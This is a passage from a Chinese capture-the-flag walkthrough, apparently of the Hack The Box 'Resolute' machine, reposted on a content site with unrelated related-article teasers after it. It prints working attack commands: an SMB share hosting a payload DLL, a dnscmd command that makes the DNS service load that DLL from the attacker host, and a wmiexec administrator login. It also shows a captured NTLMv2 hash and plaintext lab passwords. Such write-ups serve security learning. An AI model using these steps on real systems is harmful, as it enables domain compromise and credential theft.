        Final size of dll file: 8704 bytes
    使用impacket包下的smbserver.py开启SMB共享,用于加载载荷DLL。
    命令:
        python3 smbserver.py share /home/kali/Desktop/temp/
    回显:
        Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
        [*] Config file parsed
        [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
        [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
        [*] Config file parsed
        [*] Config file parsed
        [*] Config file parsed
        [*] Incoming connection (10.10.10.169,49744)
        [*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
        [*] User RESOLUTE\RESOLUTE$ authenticated successfully
        [*] RESOLUTE$::MEGABANK:aaaaaaaaaaaaaaaa:e49c4be2db354722fa97566e8b70dc25:01010000000000008072dd93642ad9010b22281d41e3938400000000010010006d00710042004f00750066004d005400030010006d00710042004f00750066004d0054000200100069004b0061006200490055004c006f000400100069004b0061006200490055004c006f00070008008072dd93642ad901060004000200000008003000300000000000000000000000004000007c98156cf5cb7544a109737d652c69e8d012b63ce8ab077535416d60b20781190a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0039000000000000000000
        [*] Disconnecting Share(1:IPC$)
        [*] Disconnecting Share(2:SHARE)
        [*] Closing down connection (10.10.10.169,49744)
        [*] Remaining connections []
        以上RESOLUTE$回显是Evil和重启dns后会打出
    Evil命令:
        *Evil-WinRM* PS C:\Users\ryan\Documents> cmd /c dnscmd localhost /config /serverlevelplugindll \\10.10.16.9\home\kali\Desktop\temp\666.dll
    回显:
        Registry property serverlevelplugindll successfully reset.Command completed successfully.
    命令说明:
        dnscmd实用程序可以用来将攻击机SMB的DLL路径设置到Windows注册表中
    重新启动DNS服务,以加载载荷DLL命令:
        sc.exe stop dns
        sc.exe start dns
    需要注意:
        DnsAdmins在默认情况下不能重新启动DNS服务,该域管设置了DnsAdmins组具有该权限

使用wmiexec登录域控获得system权限

administrator:Hack@123!
命令:
    python3 wmiexec.py administrator@10.10.10.169
回显:
    python3 wmiexec.py administrator@10.10.10.169
    Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

    Password:
    [*] SMBv3.0 dialect used
    [!] Launching semi-interactive shell - Careful what you execute
    [!] Press help for extra shell commands
    C:\>

总结

通过nmap扫描发现是域控机器,使用windapsearch工具发现关闭了预认证使用AS-REP Roasting攻击拿到域账号,通过查询域内账号描述发现
marko:Welcome123!账号将密码写到描述中,通过crackmapexec验证发现无法登录收集之前获得域账号信息并继续使用crackmapexec喷洒密码Welcome123!,
发现melanie账号喷洒成功,使用bloodhound.py收集域信息并分析域信息,melanie账号具有CanPSRemote权限,可以进行远程登录,使用evil-winrm登录域控
登录域控后进行信息收集,在PowerShell转录日志记录在这里面发现了MEGABANK\ryan:Serv3r4Admin4cc123!使用bloodhound进行分析下该账号,
ryan账号具有CanPSRemote权限尝试能否登录到域控,ryan账号属于CONTRACTORS@MEGABANK.LOCAL组, CONTRACTORS@MEGABANK.LOCAL组有属于DNSADMINS@MEGABANK.LOCAL的成员,
使用滥用DNS Admin组进行权限提升后通过wmiexec登录域控获得system权限。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/168774.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Maven学习(一):Maven简介及安装配置

Maven简介及安装配置一、Maven简介1.1、Maven是什么1.2、Maven的作用二、Maven安装配置2.1、大前提2.2、Maven下载2.3、windows版1、安装2、配置环境3、配置本地仓库2.4、mac版1、安装2、配置环境3、需要注意的点4、配置本地仓库一、Maven简介 1.1、Maven是什么 先对Maven做一…

从 Spectral Clustring 推导到 Regularized Diffusion Process

Spectral Clustring 参考:bilibili 机器学习-白板推导系列(二十二)-谱聚类(Spectral Clustering) Background 首先看一种数据分布: 对于以上分布的数据,可以直接利用K−meansK-meansK−means或者GMM(高…

2、linux_CentOS_6_64位常用命令远程操作--yum云用不了_建议学习Ubuntu

Linux的概述 学习Linux之前先了解Unix Unix是一个强大的多用户、多任务操作系统。于1969年在AT&T的贝尔实验室开发。UNIX的商标权由国际开放标准组织(The Open Group)所拥有。UNIX操作系统是商业版,需要收费,价格比Microsof…

洞悉获客之道,林肯汽车开展高端社区精准营销俘获消费者芳心

一、出场即焦点 全新领航员诠释顶级美式豪华“强大的外部气场,肌肉与优雅完美结合”,一直以来,美式豪华汽车以沉稳、古典的高端奢华气质演绎“出场即焦点”的恢弘气场,吸引着无数精英人士为之着迷、追捧。2022 年,林肯…

C/C++宏定义注意事项

宏定义后不能加“;”,如果想查找宏可能带来的bug,可以增加编译选项:/P,然后选择仅编译, 这时会生成*.i的文件,打开后可以看到编译器替换宏以后的实际内容,然后再去查看相关的替换有没有错误。带…

夏普MX-M2658N复印机显示请放入载体组件

故障描述: 一台夏普MX-M2658N复印机一开机就显示请放入载体组件,重新再次开机有可能不显示但是复印或打印的时候一定会卡纸,卡纸有时候卡在硒鼓附近或者加热组件的位置; 故障处理: 1、碳粉质量差; 2

fiddler的自动响应器_小实验

目录 一、小实验介绍 二、fiddler的自动响应器的应用 1.找对自动响应器的位置,添加规则 2.编辑规则,将这个请求用fiddler的内置响应; 3.编辑规则,将这个请求重定向到本地资源; 4.编辑响应 一、小实验介绍 承接上…

【自学Docker 】Docker ps命令

Docker ps命令 大纲 Docker ps命令概述 docker ps 命令可以用来列出 Docker容器 相关信息。 Docker ps命令语法 haicoder(www.haicoder.net)# docker ps [OPTIONS]Docker ps命令参数 选项说明无参默认显示正在运行的容器。-a显示所有的容器,包括未运行的。-f根…

[HCTF 2018]admin (三种解法详细详解)

目录 信息收集 思路一&#xff1a;弱口令爆破 思路2&#xff1a;垂直越权 代码审计 Unicode欺骗 Unicode 简介 伪造flask session 信息收集 注册登录 然后查看源码 <!-- you are not admin --> 看来需要伪造admin的身份 在changepassword页面查看源代码 <!-…

C++ 语法基础课8 —— STL/位运算和常用库函数

文章目录STL1. #include\<vector>(尾部增删)(1) 声明(2) size/empty(3) clear(4) 迭代器(iterator)(5) begin/end(遍历)(6) front/back(7) push_back()/pop_back()2. #include\<queue>(队列先进先出)(1) 声明(2) 循环队列 queue(队列结构)(3) 优先队列 priority_qu…

基于Python分析气象数据教程-1

前言本笔记介绍了如何使用 Python、pandas 和 SciPy 对天气数据进行基本分析。 它不包含对气象科学的贡献&#xff0c;但说明了如何生成简单的图和基本模型来拟合一些真实的物理观测。一、相关库引入import numpy import scipy.stats import pandas import matplotlib.pyplot a…

【零基础】学python数据结构与算法笔记13-贪心算法

文章目录前言80.贪心算法&#xff08;新一章&#xff1a;算法进阶&#xff09;81.分数背包82.分数背包实现83.数字拼接问题84.数字拼接问题实现85.活动选择问题86.活动选择问题实现87.贪心算法总结总结前言 学习python数据结构与算法&#xff0c;学习常用的算法&#xff0c; b…

LeetCode(Array)1656. Design an Ordered Stream

1. 问题 There is a stream of n (idKey, value) pairs arriving in an arbitrary order, where idKey is an integer between 1 and n and value is a string. No two pairs have the same id. Design a stream that returns the values in increasing order of their IDs b…

2023年网络安全比赛--网页渗透测试中职组(超详细)

一、竞赛时间 180分钟 共计3小时 二、竞赛阶段 1.访问服务器网站目录1,根据页面信息完成条件,将页面中的flag提交; 2.访问服务器网站目录2,根据页面信息完成条件,将页面中的flag提交; 3.访问服务器网站目录3,根据页面信息完成条件,将页面中的flag提交; 4.访问服务器网…

【Java】流式编程学习笔记

文章目录一、流简介二、创建流2.1 由值创建流&#xff1a;of2.2 由列表创建流&#xff1a;stream2.3 由 Builder 创建流&#xff1a;build2.4 由文件生成流&#xff1a;lines2.5 由函数生成流2.5.1 迭代&#xff08;如果不做限制&#xff0c;就是创建无限流&#xff09;&#x…

线性结构之单链表详解

文章目录前言一.单链表的结构体二、单链表的基本接口1.SListMalloc&#xff08;申请节点&#xff09;2.SListPushBack&#xff08;尾插&#xff09;3.SListPushFront&#xff08;头插&#xff09;4.SListPopBack&#xff08;尾删&#xff09;5.SListPopFront&#xff08;头删&a…

0115 作用域,对象

作用域意义&#xff1a;一段代码中所用到的名字不总是有效可用的&#xff0c;限定这个名字的可用性代码范围全局作用域全局有效&#xff0c;作用所有代码局部作用域局部有效&#xff0c;作用于函数内的代码环境&#xff0c;和函数有关也称函数作用域块级作用域在大括号{}有效&a…

Docker中安装Centos

window版的docker 1.cmd拉取centos镜像 docker pull centos2.启动centos容器&#xff0c;并把docker上centos的22端口映射到本机50001端口(端口号可以自己指定) 3.进入到Centos容器 通过docker命令,查看当前存在的镜像或者容器 查看镜像: docker images查看容器: docker …

js如何实现随机数切换

前言在一些电商网站,或一些活动页上,看到一些特效,比如:抽奖时,点击图片,实现图片的随机切换,数字的随机切换等,为了吸引用户的注意力,增加网页的互动性,这个效果是怎么实现的呢01具体示例https://coder.itclan.cn/fontend/js/14-click-num-suiji/点击文末左下角阅读原文,即可查…

MySQL三大日志(binlog、redo log和undo log)详解

MySQL三大日志binlog、redo log和undo log详解1.redo logredo log概述刷盘时机innodb_flush_log_at_trx_commit0innodb_flush_log_at_trx_commit1innodb_flush_log_at_trx_commit2日志文件组2.binlogbinlog 概述记录格式写入机制刷盘时机3.两阶段提交4.undo log5.总结1.redo lo…